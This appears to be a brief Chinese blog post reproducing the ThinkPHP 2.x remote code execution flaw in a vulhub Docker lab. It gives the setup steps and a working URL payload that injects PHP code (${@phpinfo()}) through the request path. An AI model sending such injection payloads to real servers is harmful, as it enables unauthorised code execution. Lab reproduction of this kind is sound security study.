thinkphp2.xRCE漏洞复现
1.vulhub下载在kali里面
2.访问到这个路径

3.docker-compose up -d
启动环境之后访问ip:8080
4显示页面

5.RCE命令执行

http://your-ip:8080/index.php?s=/index/index/name/${@phpinfo()}
作者:
Shu-How Z
本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须在文章页面给出原文连接,否则保留追究法律责任的权利。

启动环境之后访问ip:8080


http://your-ip:8080/index.php?s=/index/index/name/${@phpinfo()}